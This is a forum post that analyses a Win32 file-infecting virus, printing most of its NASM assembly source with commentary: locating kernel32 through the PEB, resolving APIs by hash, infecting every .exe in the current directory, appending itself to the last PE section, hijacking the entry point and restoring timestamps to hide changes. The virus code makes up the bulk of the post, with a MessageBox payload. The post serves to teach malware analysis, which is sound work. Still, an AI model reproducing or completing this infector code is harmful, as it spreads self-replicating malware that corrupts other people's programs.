Understanding a Win32 Virus: Code Analysis


Continuing the discussion from Understanding a Win32 Virus: Background Material:

Code Analysis

Let’s begin with the first section of the code.

[BITS 32]    ; defines 32-bit
%include "win32n.inc"
        call CodeStart
        pop ebp
        sub ebp,CodeStart

The win32n.inc simply defines a long list of structs which will be used later. A technique used here by calling CodeStart and then poping and then subing itself from CodeStart is called delta offset where by calling a routine directly in the address in front of itself, having it pop off the return address and then subtracting it from the address of the routine will result in the starting address of this code. This is especially important because since addresses are almost guaranteed to be different in each process’s memory space, it provides a means of creating a relative base offset to allow variables to be accessed without breaking anything.

;    Retrieve Kernel base                             ;
    mov ebx, [fs : 0x30]   ; get a pointer to the PEB
    mov ebx, [ebx + 0x0C]   ; get PEB->Ldr
    mov ebx, [ebx + 0x14]   ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
    mov ebx, [ebx]   ; 2nd Entry
    mov ebx, [ebx]   ; 3rd Entry
    mov ebx, [ebx + 0x10]   ; Get Kernel32 Base
    mov [ebp+dwKernelBase] , ebx

This is pretty self-explanatory from the details in the background information section. If we look at the last line, we can see the variable dwKernelBase being used through the offset of ebp. Why ebp? If you’ve forgotten already, look above this code extract. Please note that I’ve also listed the offsets for the structs, again, in the previous section.

;         Retrieve function addresses                     ;
    sub esp , 68      ;save function addresses on the stack
    mov ebx , esp
    lea edi,[ebp+Kernel_APIs]
    mov ecx,16
    mov edx,[ebp+dwKernelBase]
    push ebp
    mov ebp , ebx
    call RetrieveAPIs

Here, esp is subtracted to hold the address of the functions as local variables. The RetrieveAPIs function is documented such that the DLL base be in edx, a pointer to a list of the required functions in edi, the number of functions needed in ecx and a pointer to the offset where the function address will be stored in ebp. Note that since we have 16 functions, we require at least 16 * 4 bytes of data to store all the addresses, i.e. at least 64 bytes, the stack pointer esp has been subtracted to at least this size. let’s take a quick look at the RetrieveAPIs function before resuming this section of code.

;                                    RetrieveAPIs                               ;
;  Parameters :  DLL base in edx , CRCs Offset in edi , No.of APIs in ecx , Offset to store at in ebp   ;
    push ebx
    push esi
    mov esi, edx
    add esi, [esi+0x3C] ; Start of PE header
    mov esi, [esi+0x78] ; RVA of export dir
    add esi, edx     ; VA of export dir
    push esi      ; [esp] = VA of export dir
    mov esi, [esi+0x20] ; RVA of ENT
    add esi, edx     ; VA of ENT
    xor ebx,ebx
        inc ebx
        add eax , edx       ;eax now points to the string of a function
        call GenerateCRC       ;eax now holds the hash of our function
        cmp dword [edi] , eax
        jne looper
        mov eax,[esp]
        mov eax,[eax+0x24]     ;RVA of EOT
        add eax,edx      ;VA of EOT
        movzx eax , word [(ebx-1)*2+eax]   ;eax now holds the ordinal of our function
        push esi
        mov esi,[esp+4]
        mov esi,[esi+0x1C]     ;RVA of EAT
        add esi,edx      ;VA of EAT
        mov esi,[eax*4+esi]    ; use the ordinal * 4 to get the offset to the function address
        add esi,edx
        mov [ebp] , esi     ;save address
        pop esi
        add edi,4
        add ebp,4
        dec ecx
        jnz looper
    pop esi
    pop esi
    pop ebx

I’ve covered the necessary material at the end of the previous section. Essentially, what this piece of code does is it will iterate through the list of the kernel32's function name list, convert the string with CRC and then compare it with the required functions (which have been initially parsed through CRC) in an alphabetical manner. If the two “hashes” match, it will obtain the function’s address by first getting the ordinal and then using it as an offset. It will then be stored on the stack and then ebp will be incremented by 4 to point to the next location for the next function’s address. I won’t worry too much about the specifics of the instructions used but if you wish to know, please leave a comment below and I will explain it. Let’s continue the previous section of code.

    pop ebp
    lea edx,[ebp+szUser32]    ; "user32.dll"
    push edx
    call [ebx+36]    ; LoadLibrary
    mov edx,eax
    lea edi,[ebp+User_APIs]
    xor ecx,ecx
    inc ecx
    push ebp
    lea ebp , [ebx+64]   ; save the function address on the stack here
    call RetrieveAPIs    ; get MessageBox function address
    pop ebp

As we’ve seen in the analysis from the previous article, the payload is a MessageBox but the function does not exist in kernel32. Instead, it’s located in the user32 DLL. The virus needs to perform the same procedure as it did with kernel32 but this time, on user32. Since the module is not loaded into the address space by default, it must dynamically perform it using the LoadLibrary function first. Now that the virus has all of its required tools, let’'s finally analyze the viral routine.

;   Infection routine : Infect all files in the current directory          ;
    sub esp,324
    push esp
    lea edx,[ebp+szExe]    ; "*.exe"
    push edx
    call [ebx+16]          ; FindFirstFile
    inc eax
    jz endInfection        ; if (FindFirstFile(...) == INVALID_HANDLE_VALUE)
    dec eax                ; restore return value of FindFirstFile
    mov dword [esp+320] , eax  ;save search handle
    call infectFile
    push esp
    push dword [esp+324]
    call [ebx+20]          ; FindNextFile
    test eax,eax           ; if (FindNextFile(...) != FALSE)
    jnz infectNextFile     ; loop
    add esp,324

To infect a file, it must first find a file to infect. Using FindFirstFile with the file search to match *.exe, it will provide a WIN32_FIND_DATA struct containing the information of the first found matching file in the working directory. If a file is found, it will call infectFile and continue looping until all matching files are infected.

;    infectFile routine               ;
    sub esp,48
    push ebp
    lea ebp,[esp+4]  
    mov edx , dword [ebp+52+WIN32_FIND_DATA.nFileSizeLow]
    mov [ebp+0] , edx
    mov [ebp+44] , edx
    add dword [ebp+0] , virSize+1000h    ;fileSize+virSize+extra work space
    lea esi , [ebp+52+WIN32_FIND_DATA.cFileName]
    push esi              ; lpFileName
    call [ebx+28]         ;save original attributes; GetFileAttributes
    mov [ebp+4] , eax
    push dword 0x80       ; dwFileAttributes, FILE_ATTRIBUTE_NORMAL
    push esi              ; lpFileName
    call [ebx+48]         ;set to normal , ie clear all attributes: SetFileAttributes

Before attaching its own code onto the file, it will first save the original file attributes using GetFileAttributes and then set it’‘s file attributes to FILE_ATTRIBUTE_NORMAL. I’'m assuming that the author decided to do this to make sure it had the correct permissions to write to the file in the circumstance that it was read-only.

    xor edi,edi
    push edi                   ; hTemplateFile, NULL
    push edi                   ; dwFlagsAndAttributes, NULL
    push 3                     ; dwCreationDisposition, OPEN_EXISTING
    push edi                   ; lpSecurityAttributes, NULL
    push edi                   ; dwShareMode, 0
    push 0xC0000000            ; dwDesiredAccess, GENERIC_READ | GENERIC_WRITE
    push esi                   ; lpFileName, file to be infected
    call [ebx+4]               ; CreateFile
    inc eax
    jz done                    ; if (CreateFile(...) == INVALID_HANDLE_VALUE)
    dec eax                    ; restore return value
    mov dword [ebp+8] , eax    ; save file handle on local stack

To infect the file, the handle to it must be obtained by using CreateFile using the GENERIC_READ | GENERIC_WRITE access rights and opening an existing file with OPEN_EXISTING.

    lea edx , [ebp+12]    ; 
    push edx              ; lpLastWriteTime
    add edx,8
    push edx              ; lpLastAccessTime
    add edx,8
    push edx              ; lpCreationTime
    push eax              ; hFile
    call [ebx+32]         ; GetFileTime

I’'m assuming that the code here makes a call to GetFileTime to retrieve the pre-infected files times in an attempt to prevent any forensic evidence after modifying its contents.

    push edi               ; lpName, NULL
    push dword [ebp+0]     ; dwMaximumSizeLow
    push edi               ; dwMaximumSizeHigh, 0
    push 4                 ; flProtect, PAGE_READWRITE
    push edi               ; lpAttributes, NULL
    push dword [ebp+8]     ; hFile
    call [ebx+8]           ; CreateFileMapping
    mov [ebp+36] , eax     ; save handle to mapping on local stack
    push dword [ebp]       ; dwNumberOfBytesToMap, dwMaximumSizeLow
    push edi               ; dwFileOffsetLow, 0
    push edi               ; dwFileOffsetHigh, 0
    push 2                 ; dwDesiredAccess, FILE_MAP_WRITE(?)
    push dword [ebp+36]    ; hFileMappingObject
    call [ebx+40]          ; MapViewOfFile
    mov esi,eax
    mov edi,eax
    mov [ebp+40] , eax     ; save pointer to mapped file

Writing to an executable file is a bit more complex than simply appending to it. As the Windows loader sets up the executable into memory, it must rely on the data within the structures of the PE format to know what kind of data it is and how much data to write to memory. To achieve this, the host file must be mapped to the process’s address space for modification with read and write acces using CreateFileMapping and MapViewOfFile. If you’re having trouble with understanding this, just imagine that the host file has been read and then loaded into a buffer.

    cmp word [esi] , 'MZ'       ; 'MZ' e_magic
    jne UnMap
    cmp byte [esi+50h] , 't'    ;already infected ?
    je UnMap
    mov byte [esi+50h] , 't'    ;marked
    add esi , [esi+0x3C]        ; move offset of esi to point to PE header
    cmp word [esi] , 'PE'       ; 'PE' signature
    jne UnMap

The next thing to do now is to check if the file is a proper PE file by checking the MZ magic and the PE signature. Here, the author has decided to tag an infected file using the letter t at offset 0x50 from the beginning of the file. If the file is already infected or is not detected as a PE file, it will skip the infection process for optimization.

    mov ecx , esi      ;ecx points to start of pe header
    movzx edx , word [esi+6]    ;no. of sections
    dec edx                     ; sections start with index 0
    imul edx , 0x28             ; size of IMAGE_SECTION_HEADER
    add esi , 0xF8              ; distance from PE header to first section header
    add esi , edx      ;esi points to header of the last section
    add edi , [esi+14h]         ; edi = PointerToRawData
    add edi , [esi+8]     ;start copying virus at offset : map + pointerToRawData + virtualSize
    or dword [esi+0x24] , 00000020h | 20000000h | 80000000h | 80h  ;set flags (writable , executable , etc)

For the viral code to be accessible by EIP, the section it resides in must be executable. We can see that the virus does indeed just append to the end of the last section (as we assumed in the analysis demonstration). When it has reached the section header, it ORs the Characteristics member to include the executable flag IMAGE_SCN_MEM_EXECUTE to grant the CPU access to execute the virus.

    add dword [esi+8] , virSize ;increase virtual size
    mov edx , dword [esi+8]     ; edx = VirtualSize
    mov dword [ecx+50h] , edx   ; save VirtualSize to local stack
    mov edx , [esi+0xC]         ; edx = VirtualAddress
    add dword [ecx+50h] , edx   ; VirtualSize += VirtualAddress (RVA end of section data)
    mov eax , dword [ecx+50h]   ; eax = RVA end of section data
    xor edx , edx
    div dword [ecx+38h]         ; eax /= SectionAlignment, edx = eax % SectionAlignment (remainder)
    mov eax , [ecx+38h]         ; eax = SectionAlignment
    sub eax , edx               ; SectionAlignment -= remainder
    add dword [ecx+50h] , eax   ;new aligned SizeOfImage
    xor edx,edx
    mov eax , dword [esi+8]     ; eax = VirtualSize
    div dword [ecx+3Ch]         ; eax /= FileAlignment, edx = eax % FileAlignment (remainder)
    mov eax , dword [ecx+3Ch]   ; eax = FileAlignment
    sub eax , edx               ; eax -= remainder
    push ecx                    ; preserve ecx
    mov ecx, dword [esi+8]      ; ecx = VirtualSize
    mov dword [esi+10h] , ecx   ; SizeOfRawData = VirtualSize
    add dword [esi+10h] , eax   ;new aligned SizeOfRawData += VirtualSize
    mov ecx , dword [esi+10h]   ; ecx = new SizeOfRawData
    mov dword [ebp+44] , ecx    ;save new file size for later call to SetFilePointer
    mov ecx , dword [esi+14h]   ; ecx = PointerToRawData
    add dword [ebp+44] , ecx    ; file size = SizeOfRawData + PointerToRawData
    pop ecx                     ; restore ecx

Before adding the malicious code to the file, the program fixes the section header’s data accordingly by adding the size of itself and then realigning the section alignment and file alignment values. The author has chosen to save the new size (original size plus the malicious code) of the file for use later on.

    mov eax , dword [esi+0xC]   ; eax = VirtualAddress
    add eax , dword [esi+8]     ; eax += VirtualSize
    mov edx , dword [ecx+28h]   ;save OEP
    add edx , dword [ecx+34h]   ;Add Image base to OEP
    sub eax , virSize           ; eax -= virSize (start of virus code)
    mov dword [ecx+28h] , eax   ;set new entry point
    mov esi , virStart          ; esi = base of code
    add esi , dword [esp]       ; esi += offset to beginning of code
    mov ecx , virSize           ; number of bytes to copy
    cld                         ; set forward direction for rep
    rep movsb         ;copy virus
    sub edi , virSize-(backToHost-virStart)-1    ; OEP placeholder address
    mov dword [edi] , edx      ;patch OEP

In the first half of the code here, the OEP (Original Entry Point) is calculated so that once the virus has finished execution, the infected program can continue its regular routine. To copy the virus code into the target file using rep movsb, esi is given the value of the beginning of the virus, edi is given the location of where the data will be copied to and ecx is given the size of the data to copy. Once the virus code has been copied, a placeholder for the OEP will be overwritten with the actual OEP.

    push dword [ebp+44]
    push dword [ebp+40]
    call [ebx+24]        ;FlushViewOfFile
    push dword [ebp+40]
    call [ebx+60]        ;UnMapViewOfFile
    push dword [ebp+36]
    call [ebx]        ;Close Map Handle
    lea edx , [ebp+12]
    push edx
    add edx,8
    push edx
    add edx,8
    push edx
    push dword [ebp+8]
    call [ebx+56]        ;Restore original file time
    push 0
    push 0
    push dword [ebp+44]
    push dword [ebp+8]
    call [ebx+52]        ;SetFilePointer
    push dword [ebp+8]
    call [ebx+44]        ;SetEndOfFile
    push dword [ebp+8]
    call [ebx]        ;Close File Handle
    push dword [ebp+4]
    lea edx , [ebp+52+WIN32_FIND_DATA.cFileName]
    push edx
    call [ebx+48]        ;Restore original attributes
    pop ebp
    add esp,48

I won’t bother going through this section of the code since it’s pretty self-explanatory. Essentially, it just cleans up handles and sets values back to the file, then returns.

;             Main Payload            ;
    push 0x10                              ; uType; MB_ICONERROR
    lea edx,[ebp+szTitle]
    push edx                               ; lpCaption
    lea edx,[ebp+szMsg] 
    push edx                               ; lpText
    push 0                                 ; hWnd
    call [ebx+64]                          ; MessageBox
    cmp dword [ebp+backToHost+1] , 'SiGs'  ;first generation ?
    jne returnToHost
    push 0                                 ; uExitCode; 0
    call [ebx+12]                          ; ExitProcess

This is the payload of the virus, i.e. the message box.

;            Return to host           ;
    add esp , 68    
    popad           ; restore register values from before start of virus
    push 'SiGs'     ; push OEP
    retn            ; return to OEP

Again, this code section is self-explanatory.


This concludes the code analysis of the Win32 Virus. If there’s anything that I’ve missed, please notify me and I will try to correct is ASAP. Otherwise, thanks for reading and hope you’ve learned something valuable.

– dtm


Windows Keylogging - Part I
(123loaded) #2

I can’t get enough of these man!! Keep em coming pleaseeeee!!!
Moooooaaaarrrr!!! <3



Relax m8te.

1 Like

closed #4

This topic was automatically closed after 30 days. New replies are no longer allowed.